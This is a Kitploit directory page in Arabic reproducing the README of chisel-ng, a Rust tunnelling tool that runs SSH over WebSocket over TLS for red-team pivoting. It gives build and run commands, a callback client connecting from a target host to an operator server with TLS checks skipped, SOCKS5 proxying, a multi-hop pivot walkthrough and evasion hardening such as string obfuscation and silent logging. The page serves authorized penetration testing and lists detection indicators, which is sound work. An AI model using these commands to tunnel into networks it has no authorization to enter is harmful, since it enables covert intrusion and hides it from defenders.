Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
chisel-ng — الجيل الجديد من Chisel، مكتوب بلغة Rust. SSH عبر WSS مع بعض التخصيصات. | Kitploit
أدوات/GitHubGitHub/nullsection/chisel-ng
التهرب من IDS/IPSالحركة الجانبيةما بعد الاستغلالأمن الشبكاتاختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعد
GitHubnullsection/chisel-ng

chisel-ng

الجيل الجديد من Chisel، مكتوب بلغة Rust. SSH عبر WSS مع بعض التخصيصات.

عرض المستودع
13696منذ 7 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

| | ()___ | | _ __ __ _ / | ' | / |/ _ \ || ' \ / ` | | (__| | | | _ \ / || | | | (| | _|| |||/_|| || ||_, | |___/

chisel-ng

Rust License Windows Linux

تطبيق Rust لأداة chisel لاختبار الاختراق وعمليات الفريق الأحمر. ينشئ أنفاقًا عكسية عبر SSH عبر WebSocket عبر TLS، مما يسمح للمشغلين بالتنقل عبر المضيفين المخترقين مع الاندماج مع حركة HTTPS العادية.


جدول المحتويات

  • بداية سريعة
  • الميزات
  • الهندسة المعمارية
  • مرجع الاستخدام
    • الخادم (المشغل)
  • العميل العكسي (الوكيل)
  • العميل الملزم (الوكيل - وضع الداخل)
  • أوامر واجهة الخادم
  • التنقل عبر عدة قفزات
  • تفاصيل تقنية
  • اعتبارات OPSEC
  • إخلاء مسؤولية

  • بداية سريعة

    المتطلبات

    • Rust 1.70+ (rustup.rs)

    البناء

    root@kitploit:~
    git clone https://github.com/nullsection/chisel-ng
    cd chisel-ng
    cargo build --release
    

    تخرج الملفات التنفيذية إلى target/release/: chisel-server، chisel-client، chisel-bind-client

    الاستخدام الأساسي

    1. تشغيل الخادم (المشغل):

    root@kitploit:~
    ./chisel-server -p 'secret' -v
    

    2. تشغيل العميل (الهدف):

    root@kitploit:~
    ./chisel-client -s operator.example.com:8443 -p 'secret' -k
    

    3. إنشاء الأنفاق:

    root@kitploit:~
    chisel-ng> session 1
    [session-1] TARGET > tunnel 8080:192.168.1.100:80
    [session-1] TARGET > socks5 1080
    

    4. الوصول إلى الخدمات الداخلية:

    root@kitploit:~
    curl http://127.0.0.1:8080
    curl --socks5 127.0.0.1:1080 http://internal.corp/
    

    الميزات

    • SSH عبر WebSocket عبر TLS - الاندماج مع حركة HTTPS العادية
    • مصادقة مفتاح مشترك مسبقًا - مصادقة بسيطة وآمنة
    • إعادة توجيه المنافذ الديناميكي - إنشاء الأنفاق حسب الطلب
    • وكيل SOCKS5 - التوجيه الديناميكي عبر الوكلاء
    • وضعان للعميل - عكسي (يتصل بالخارج) وملزم (يقبل الاتصالات الواردة)
    • عبر المنصات - ويندوز ولينكس

    الهندسة المعمارية

    root@kitploit:~
    +------------------+              +----------------------------------+
    |     المشغل       |              |         الشبكة المستهدفة         |
    |                  |              |                                  |
    | +--------------+ |     SSH      | +--------------+                 |
    | |chisel-server |<---------------+-|chisel-client |                 |
    | |    :8443     | |   (عبر TLS)  | |  (عكسي)      |                 |
    | +--------------+ |              | +--------------+                 |
    +------------------+              +----------------------------------+
    

    مكدس البروتوكول:

    root@kitploit:~
    TCP -> TLS 1.3 -> WebSocket -> SSH -> بيانات النفق
                         ^
                يظهر كـ HTTPS
    

    أوضاع العميل:

    • عكسي (chisel-client) - يتصل بالخادم (اتصال صادر)
    • ملزم (chisel-bind-client) - يستمع للاتصالات الواردة؛ يستخدم الخادم الأمر connect

    مرجع الاستخدام

    الخادم (المشغل)
    root@kitploit:~
    OPTIONS:
        -l, --listen <ADDR>      عنوان الاستماع [الافتراضي: 0.0.0.0:8443]
        -p, --psk <PSK>          المفتاح المشترك مسبقًا أو كلمة المرور [متغير بيئة: CHISEL_PSK]
            --cert <FILE>        شهادة TLS (PEM)
            --key <FILE>         المفتاح الخاص لـ TLS (PEM)
            --generate-psk       إنشاء PSK عشوائي والخروج
        -v, --verbose            إخراج مفصل
    
    العميل العكسي (الوكيل)
    root@kitploit:~
    OPTIONS:
        -s, --server <ADDR>      عنوان الخادم (host:port)
        -p, --psk <PSK>          المفتاح المشترك مسبقًا أو كلمة المرور [متغير بيئة: CHISEL_PSK]
        -u, --user <LABEL>       تسمية الجلسة [الافتراضي: agent]
        -k, --insecure           تخطي التحقق من TLS
            --no-reconnect       تعطيل إعادة الاتصال التلقائي
        -i, --interval <SECS>    فترة إعادة الاتصال [الافتراضي: 30]
            --heartbeat <SECS>   فترة نبضات القلب [الافتراضي: 30]
        -v, --verbose            إخراج مفصل
    
    العميل الملزم (الوكيل - وضع الداخل)

    للأهداف التي يمكنها قبول الاتصالات الواردة ولكن لا يمكنها بدء الاتصالات الصادرة:

    root@kitploit:~
    OPTIONS:
        -l, --listen <ADDR>      عنوان الاستماع (مثال: 0.0.0.0:9000)
        -p, --psk <PSK>          المفتاح المشترك مسبقًا أو كلمة المرور [متغير بيئة: CHISEL_PSK]
        -u, --user <LABEL>       تسمية الجلسة [الافتراضي: agent]
        -k, --insecure           تخطي التحقق من TLS
            --heartbeat <SECS>   فترة نبضات القلب [الافتراضي: 30]
        -v, --verbose            إخراج مفصل
    
    أوامر واجهة الخادم

    القائمة الرئيسية:

    root@kitploit:~
    sessions             عرض الجلسات المتصلة
    session <id>         تحديد جلسة
    connect <ip:port>    الاتصال بعميل ملزم
    disconnect <id>      قطع الجلسة (سيتم إعادة الاتصال)
    kill <id>            إنهاء عملية العميل
    

    قائمة الجلسة:

    root@kitploit:~
    tunnel <local>:<target_ip>:<target_port>    إنشاء نفق
    tunnel --local <local>:<target>:<port>      إنشاء نفق (localhost فقط)
    tunnel stop <port>                          إيقاف النفق
    tunnels                                     عرض الأنفاق
    socks5 <port>                               بدء وكيل SOCKS5
    socks5 stop <port>                          إيقاف وكيل SOCKS5
    ping                                        قياس زمن الوصول
    ps                                          عرض العمليات البعيدة
    netstat                                     عرض الاتصالات البعيدة
    

    التنقل عبر عدة قفزات

    الوصول إلى الشبكات المعزولة عن طريق ربط الجلسات الموجودة.

    السيناريو: مضيف DMZ يمكنه الوصول إلى المشغل. المضيف الداخلي (10.0.0.50) يمكن الوصول إليه فقط من DMZ.

    root@kitploit:~
    +----------+        +-----------+        +------------+
    | المشغل  |---SSH---| جلسة 1    |---TCP--| جلسة 2     |
    |  الخادم  |        |   (DMZ)   |        | (داخلي)  |
    +----------+        +-----------+        +------------+
    

    الخطوة 1 - تشغيل الخادم (المشغل):

    root@kitploit:~
    ./chisel-server -p 'secret' -v
    

    الخطوة 2 - تشغيل العميل العكسي (مضيف DMZ):

    root@kitploit:~
    ./chisel-client -s operator.example.com:8443 -p 'secret' -k
    

    الخطوة 3 - تشغيل العميل الملزم (المضيف الداخلي عند 10.0.0.50):

    root@kitploit:~
    ./chisel-bind-client -l 0.0.0.0:9000 -p 'secret' -k
    

    الخطوة 4 - إنشاء نفق والاتصال (واجهة الخادم):

    root@kitploit:~
    chisel-ng> session 1
    [session-1] DMZ > tunnel --local 9000:10.0.0.50:9000
    تم بدء النفق على 127.0.0.1:9000
    
    [session-1] DMZ > back
    chisel-ng> connect 127.0.0.1:9000
    تم تسجيل الجلسة 2
    
    chisel-ng> session 2
    [session-2] INTERNAL > socks5 1080
    

    تفاصيل تقنية

    كيف تعمل الأنفاق

    عند إنشاء نفق (tunnel 8080:192.168.1.100:80):

    1. يربط الخادم المنفذ المحلي 8080
    2. عند الاتصال، يرسل الخادم طلب CONNECT إلى الوكيل
    3. يتصل الوكيل بالهدف ويفتح قناة SSH direct-tcpip
    4. يمرر البيانات في كلا الاتجاهين
    كيف يعمل SOCKS5

    وجهات ديناميكية عبر مصافحة RFC 1928. يعيد رموز خطأ مناسبة لنتائج مسح المنافذ الدقيقة.


    اعتبارات OPSEC

    تعزيز الملف التنفيذي

    إصدارات الإصدار معززة:

    • تشغيل صامت - يتم تحويل جميع السجلات إلى عمليات لا تفعل شيئًا
    • تعتيم السلاسل - سلاسل البروتوكول مشفرة بـ XOR عند وقت الترجمة
    • إزالة الرموز - لا توجد رموز تصحيح أو مسارات مصدرية
    • تحسين الحجم - ~3 ميجابايت مقابل ~15 ميجابايت لإصدار التصحيح
    • سلوك الذعر - الإجهاض الفوري، لا توجد تتبعات للمكدس
    الأمن التشغيلي
    • مصادقة PSK - مفتاح 256 بت من كلمة المرور (SHA-256) أو سداسي عشري خام
    • لا تخزين للبيانات الاعتمادية - PSK عبر وسيطة أو متغير بيئة فقط
    • إعادة الاتصال التلقائي - مفعل افتراضيًا، فترة قابلة للتكوين
    • نبضات القلب - إبقاء الاتصال حيًا قابل للتكوين، تعطيل باستخدام --heartbeat 0
    نواقل الكشف
    • بصمة TLS JA3/JA4
    • أنماط ترقية WebSocket
    • مدة الاتصال الطويلة
    • فترات نبضات القلب الثابتة

    إخلاء مسؤولية

    هذه الأداة مخصصة لاختبار الأمان المصرح به فقط. احصل على التفويض المناسب قبل الاستخدام. المؤلفون ليسوا مسؤولين عن سوء الاستخدام.


    الترخيص

    MIT

    تنزيل الأداة